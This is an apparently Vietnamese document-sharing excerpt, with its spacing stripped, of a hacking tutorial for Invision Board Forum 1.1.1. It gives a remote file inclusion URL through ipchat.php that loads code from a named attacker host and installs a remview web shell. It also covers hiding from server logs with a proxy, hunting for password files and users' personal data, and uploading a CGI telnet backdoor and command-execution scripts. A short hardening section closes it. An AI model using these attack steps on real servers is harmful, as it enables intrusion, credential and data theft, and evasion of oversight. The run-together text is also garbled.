Hack IBF 1

Tham khảo tài liệu hack ibf 1, công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả
Nội dung trích xuất từ tài liệu:
Hack IBF 1.HackIBF1.1.1qualỗicủafileipchat.phptrangnàyđãđượcđọc lầnhttp://[mụctiêu]/ipchat.php?root_path=http://www33.brinkster.com/nddt999/file/sauđóbạncóthểxàiremviewquađịachỉ:htt://[mụctiêu]/conf_global.php?c=lđểkhaithácthànhcônglỗinàythìmáychủphảicàiforumibf1.1.1chưađượcpatchlỗicodeinjectiontrongfileipchat.php,php.ini:register_globals=on&allow_url_fopen=onnguyênnhândofilelỗicodeinjectiontrongfileipchat.php.nộidungcủafilenàynhưsau:nếucáiservernàochưađượcpatchlỗinàyvàcấuhìnhphpchođăngkíbiếntoàncục+truycậpfileremotethìchúngtacóthểkhaithácđạiloạinhưsau:http://[target]/ipchat?root_path=http://[attacker]/cụthểlàhttp://[mụctiêu]/ipchat.php?root_path=http://www33.brinkster.com/nddt999/filethìnódòngrequire...;trongfileipchat.phpsẽlà:requirehttp://www33.brinkster.com/nddt999/file/conf_global.php;filenàysẽthayđổinộidungcủafileconf_global.phptrênmáychủvàcàiremviewvàođây.(bạnxem2filehttp://www33.brinkster.com/nddt999/file/remview.php &base64.phpsẽrõ,fileremview.phpbịthayđổimộtchútxíuchophùhợp)chodùsetquoteđãđượcbậtthìvẫncóthểkhaithácđượcởđây.hihi,bạnthamkhảosourcecodecủaremview.phpsẽrõ!mìnhchỉlợidụngmộtchỗhởcủaforumIBFthôi.đâylàmộtđoạntrongfilehướngdẫncàiđặtbạnphảichmod777chothưmụcuploadsvàfileconf_global.phptrướckhitiếnhànhcàiđặtforum.quátệphảikhông?mìnhđãthửuploadfileremview.phplênthưmụcuploadsnhưngnóchỉđượcsetuser/grouplàuid&gidđangcóhiệulựchiệntại,cụthểlàowner/group=nobody/nobody.khisafemodeđãđượcbật,nếuchạyhttp://target/uploads/remview.phpthìnóchẳngchạyđâudoowner/grouplànobody/nobodykhácvớiowner/groupcủathưmụchiệntại.vìvậychỉcóthểkiếmcáifilenàođóđượcchmod777màxàithôi.mìnhchọnconf_global.phpdofilenàydefaultđượcsetpermisionslà777àlưuýbạnchỉnênchạydònghttp://[mụctiêu]/ipchat.php?root_path=http://www33.brinkster.com/nddt999/file/MỘTLẦNDUYNHẤT!nếuchạyhttp://[mụctiêu]/ipchat.php?root_path=http://www33.brinkster.com/nddt999/file/ch úngtasẽbịghinhấtkíngay.file.logcủahttpdnhưsau:??/??/2003[111.222.333.444]GET/ipchat.php?root_path=http://www33.brinkster.com/nddt999/file/HTTP/1.0đểtránhghinhậtkíkhikhaithác,bạntạomộtfilehtmlnhưsau:mởIE,setlạiproxylàproxy.ia2.marketscore.comvàsauđóchạyfilehtmlvừatạo.ok,nhậtkícủahttpdsẽnhưsau:??/??/2003proxy.ia2.marketscore.com[66.119.34.38]POST/ipchat.phpHTTP/1.0thậtsựthìhọchẳngbiếtđịachỉipcủachúngtavàcũngchẳngbiếtđượcchúngtađãcàiremview.phpbằngcáchnàonữachúngtatiếptụcvớiviệcleothangquyền.saukhibạnuploadfileremview.phpbạncóthểxàiđồnghềnàyđểđikiếmchátvàithứkhác.cácfilebạncầnđểýđếnlà.passwd,passwords.txt,users.txt,config.php,...chúngtasẽthămdòtoànbộcácfilechứausername&password.bạncũngnênthuthậpthêmvàithôngtinkhácnhưđịachỉemail,thôngtincánhâncủacácusersmàbạncóthểtruycậpđếntrênserver.mộtvấnđềnữalàbạnnêncốtìmtrênserverfile.cgi,.plgặplỗi(thườngnằmtrongthưmụccgibin)hoặccácthưmụccgimàchúngtacóthểuploadfilecgi.khichếđộsafemodeđãđượcbậtthìrấtkhólàmgìđược.chúngtanênchuyểnsangxàicgiđểhackdễhơn.hihi,bạncốgắnguploadbackdoorcgitelnet.pllênserverđểxàinha.mộtsốđồnghềphpmàmìnhđãcode(đểhổtrợchohackcodeinjectionthôi).uh,mìnhquênviếtsql.phprồihttp://www33.brinkster.com/nddt999/file/tree.php :dirtree,rấtcầnđểthamdòtoànbộcấutrúccủathưmụcpublic_htmlhttp://www33.brinkster.com/nddt999/file/phpinfo.php :xácđịnhuid/gidđangcóhiệulựcvàlấythôngtintừhàmphpinfo();http://www33.brinkster.com/nddt999/file/dir.php:liệtkê1thưmụccụthểhttp://www33.brinkster.com/nddt999/file/url.php:uploadfilequaurl://(http://&ftp://)http://www33.brinkster.com/nddt999/file/view.php:xemnộdungcủa1filecụthểtrênmáychủhttp://www33.brinkster.com/nddt999/file/get.php:lấyfiletừmáychủvềmáymìnhhttp://www33.brinkster.com/nddt999/file/cmd.php:thựcthilệnhhệthốngmấythứnàycácbạnnêncodelạituỳtheohoàncảnhcụthểcủabạn.riêngmìnhthìmìnhthíchnhấtlàhaifiletree.php&phpinfo.phpmàmìnhđãcode*phòngthủchoforumIBFcủabạn(nóichunglàchoPHP):xoángayfileipchat.phptrênserverchmodlạichofileconf_global.phplà755cấuhìnhlạifilephp.ininhưsau:allow_url_fopen=off//khôngcóphéplấyfilebằngurl://disable_functions=systempassthruexecpopenmail//vôhiệucáchàmphpnguyhiểmdisplay_errors=off//khônghiệnlỗiphpđểđềphòngtrườnghợptiếtlộthôngtinvềthưmụcđanglàmviệc,dòngvấntinsqlgặp ...